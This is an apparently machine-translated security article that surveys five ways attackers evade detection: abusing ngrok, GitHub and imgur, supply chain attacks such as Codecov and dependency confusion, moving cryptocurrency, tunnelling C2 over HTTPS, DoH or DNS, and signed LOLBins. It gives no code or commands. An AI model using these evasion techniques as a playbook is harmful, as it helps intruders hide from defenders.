From trusted penetration testing tools to lolbin (living off the land binaries), attackers are evading security detection by abusing trusted platforms and protocols.
Cisos have a series of continuously upgraded tools to help them detect and prevent malicious activities, such as network monitoring tools, virus scanners, software composition analysis (SCA) tools, digital forensics and event response (DFIR) solutions, etc.
However, we should know that network security is essentially a continuous war between attack and defense. While defenders continue to improve their skills and tools, attackers are also constantly putting forward new challenges.
Some old-fashioned technologies, such as steganography, a technology that hides information containing malicious payloads in other benign files, such as images, are developing, bringing new possibilities. For example, researchers have recently proved that even Twitter is not immune to steganography, and the images on the platform may be abused to compress up to 3MB zip files.
Worse, in addition to using obfuscation, steganography and malware packaging technologies, today’s threat actors often use legitimate services, platforms, protocols and tools to carry out their activities. This allows them to penetrate flows or activities that seem “clean” to human analysts and machines.
Here are five common strategies used by cybercriminals to cover up their tracks today:
Abuse of trusted platforms that do not issue alerts
This is a common phenomenon that security experts have found in 2020 and has lasted until this year.
From penetration testing services and tools (such as cobalt strike and ngrok) to established open source code ecosystems (such as GitHub), to image and text websites (such as imgur and Pastebin), attackers have targeted a wide range of trusted platforms in the past few years.
Generally speaking, the audience of ngrok is mostly ethical hackers. They will use the service to collect data or establish simulated tunnels for inbound connections as part of vulnerability reward exercises or penetration testing activities. But now, more and more malicious actors are abusing ngrok to directly install botnet malware or connect legitimate communication services to malicious servers. In a recent example, Xavier Mertens of the SANS Institute found a sample of such malware written in Python containing Base64 encoded code to implant backdoors on infected systems using ngrok.
Because ngrok is widely trusted, remote attackers can connect to the infected system through the ngrok tunnel, which may bypass corporate firewall or NAT protection.
In addition, GitHub is also abused to host malware from octopus scanner to gitbase-12. Recently, researchers found that a new malware uses word documents with macros to download PowerShell scripts from GitHub. The PowerShell script further downloads legal image files from the image hosting service imgur to decode the cobalt strike script on Windows systems. Cobalt strike is a popular penetration testing framework used to simulate advanced real-world network attacks, but like any security software product, it may also be abused by attackers.
Similarly, the automation tools that developers rely on are not immune.
In April, an attacker abused GitHub actions to attack hundreds of repositories in an automatic attack, which used GitHub’s servers and resources for cryptocurrency mining. It is reported that GitHub actions is a blockbuster function released at the GitHub universe developer conference, which is called “changing software development again” by Sam Lambert, GitHub system director. It supports CI / CD and is free for open source projects, so that developers can directly execute and test code on the GitHub server, helping developers and enterprises realize the automation of all software workflow.
All of these examples prove that attackers have discovered the great value of legitimate platforms that may not be blocked by using many firewalls and security monitoring tools.
Upstream attacks using brand value, reputation or visibility
After the recent solarwinds vulnerability, the security problem of software supply chain may have attracted wide public attention, but in fact, these attacks have increased for some time.
Whether it is typoquatting, brand hijacking, or dependency confusion, which was first discovered as a proof of concept study and later abused for malicious purposes, “upstream” attacks abuse the trust in the known partner ecosystem and take advantage of the popularity or reputation of brands or software components. The attacker aims to push the malicious code upstream to the trusted code base associated with the brand, and then distribute it downstream to the ultimate target: partners, customers or users of the brand.
You know, any system open to everyone will also be open to attackers. Therefore, many supply chain attacks are aimed at open source ecosystems, and some of them have been slack in verification and adhere to the principle of “open to all”. However, business organizations will also be affected by the attack.
Recently, codecov, a software audit platform, was hacked. The investigation found that the attack began on January 31, but the first customer found something wrong on April 1, which means that the intruded software has been in normal circulation for several months, and codecov has been used by many companies in the industry to test code errors and vulnerabilities. Its customers include consumer goods group P & G, network hosting company GoDaddy Inc There are more than 29000 enterprises including Australian software company atlas Corporation PLC, so the scale of potential victims can be imagined.
It is reported that in this attack, hackers illegally obtained access to their bash uploader script and modified it by using the errors in the creation of codecov’s docker image. This means that the attacker is likely to export the information stored in the continuous integration (CI) environment of codecov users, and finally send the information to a third-party server outside the codecov infrastructure.
Preventing supply chain attacks requires efforts from many aspects. Software providers will need to invest more to ensure the security of their development versions. AI and ml based Devops solutions can automatically detect and block suspicious software components, and can help prevent domain name cybersquatting, brand hijacking and dependency chaos attacks.
In addition, as more and more companies use kubernetes or docker containers to deploy their applications, container security solutions with built-in web application firewalls and the ability to detect simple misconfiguration errors early can help prevent greater compromises.
Transfer payments to cryptocurrency in a way that is difficult to track
In view of its decentralized and privacy oriented design, sellers and blackmail software operators in the dark network market often use cryptocurrency for payment.
However, although it is not forged or controlled by the government central bank, cryptocurrency still lacks the same anonymity as cash. Therefore, cybercriminals began to look for innovative ways to transfer funds between accounts, and they did find them.
Recently, the $760 million bitcoin related to the bitfinex hacking incident in 2016 is being transferred to new accounts through several smaller transactions, with transaction amounts ranging from 1 BTC to 1200 BTC.
However, cryptocurrency is not a foolproof way to hide money. On the eve of the 2020 US presidential election, the US government emptied a $1 billion bitcoin wallet, which contains funds related to the most notorious dark network market “Silk Road”, which itself was closed in 2013.
Some other cryptocurrencies, such as monero (XmR) and zcash (Zec), have anonymous transaction protection functions that are more anonymous than bitcoin. As attackers continue to look for better ways to hide their tracks, the battle between criminals and investigators will undoubtedly continue in this regard.
Use common channels and protocols
Like trusted platforms and brands, the encrypted channels, ports and protocols used by legitimate applications also provide another way for attackers to cover up their footprints.
For example, HTTPS is the most common and indispensable protocol on the web today, so it is difficult to disable port 443 (used by HTTPS / SSL) in a corporate environment.
However, DOH (DNS over HTTPS, a protocol for resolving domain names) also uses port 443 and has been abused by malware developers to transmit their commands and control (C2) commands to infected systems. In 2019, network security researchers found the first malware using DOH protocol, which is godlua based on Lua programming language. By using DOH, the malware can hide its DNS traffic through an encrypted HTTPS connection, allowing godlua to escape passive DNS monitoring.
In addition, this situation raises two problems. First, by abusing common protocols such as HTTPS or DOH, attackers enjoy the same privacy advantage of end-to-end encrypted channels as legitimate users.
Secondly, it brings challenges to network administrators. Blocking any form of DNS itself is a challenge, but now, because DNS requests and responses are encrypted through HTTPS, it becomes very troublesome for security professionals to intercept, filter and analyze suspicious traffic from many HTTPS requests incoming and outgoing through the network.
Recently, researcher Alex birsan confirmed that the dependency confusion technology can successfully invade more than 35 large technology companies, including Microsoft, apple, Tesla, PayPal, yelp, etc. The move also allowed it to successfully obtain a $30000 loophole reward from the two companies. According to birsan, by using DNS (Port 53) to steal basic information, the success rate can be improved to the greatest extent. The reason for choosing DNS is that due to performance requirements and legal DNS use, the company firewall is likely not to block DNS traffic.
Running obfuscated malware using signed binaries
File free malware using lolbin is still an effective escape technology.
Lolbin refers to legal and digitally signed executables, such as windows executables signed by Microsoft. Attackers may abuse these executables to launch malicious code with higher privileges or evade endpoint security products (such as anti-virus software).
Last month, Microsoft shared some defense technical guidelines for this method. Enterprises can use these suggestions to prevent attackers from abusing Microsoft azure lolbin.
Although confusing malware, runtime packer, VM evasion or hiding malicious payloads in images are known evasion techniques commonly used by advanced threats, their real power comes from bypassing security products or avoiding “radar” detection.
These attack scenarios are possible when the payload is combined with trusted software components, protocols, channels, services or platforms to some extent.